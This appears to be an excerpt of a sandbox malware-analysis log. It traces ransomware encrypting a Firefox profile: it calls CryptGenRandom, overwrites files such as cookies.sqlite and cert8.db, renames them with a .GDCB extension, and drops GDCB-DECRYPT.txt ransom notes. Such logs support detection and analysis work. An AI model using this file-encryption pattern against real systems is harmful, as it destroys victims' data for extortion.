Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-gfx.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-gfx.json, size = 1048576, size_out = 27953 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-gfx.json, size = 27968 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-gfx.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-gfx.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-gfx.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-gfx.json.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-plugins.json, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-plugins.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-plugins.json, size = 1048576, size_out = 201408 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-plugins.json, size = 201408 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-plugins.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-plugins.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-plugins.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-plugins.json.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist.xml, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist.xml, size = 1048576, size_out = 257951 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist.xml, size = 257952 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist.xml, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist.xml, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist.xml, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist.xml.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\bookmarkbackups\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\bookmarkbackups\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db, size = 1048576, size_out = 98304 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db, size = 98304 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\compatibility.ini, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\compatibility.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\compatibility.ini, size = 1048576, size_out = 208 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\compatibility.ini, size = 208 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\compatibility.ini, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\compatibility.ini, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\compatibility.ini, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\compatibility.ini.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\containers.json, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\containers.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\containers.json, size = 1048576, size_out = 809 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\containers.json, size = 816 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\containers.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\containers.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\containers.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\containers.json.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite, size = 1048576, size_out = 229376 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite, size = 229376 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite, size = 1048576, size_out = 524288 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite, size = 524288 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\crashes\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\crashes\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\crashes\events\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\crashes\events\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\archived\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\archived\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\archived\2017-05\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\archived\2017-05\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\session-state.json, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\session-state.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\session-state.json, size = 1048576, size_out = 135 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\session-state.json, size = 144 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\session-state.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\session-state.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\session-state.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\session-state.json.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\state.json, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\state.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\state.json, size = 1048576, size_out = 51 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\state.json, size = 64 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\state.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\state.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\state.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\state.json.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.ini, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.ini, size = 1048576, size_out = 185 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.ini, size = 192 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.ini, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.ini, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.ini, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.ini.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.json, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.json, size = 1048576, size_out = 5931 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.json, size = 5936 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\extensions.json.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite, size = 1048576, size_out = 196608 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite, size = 196608 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp\WINNT_x86-msvc\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp\WINNT_x86-msvc\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
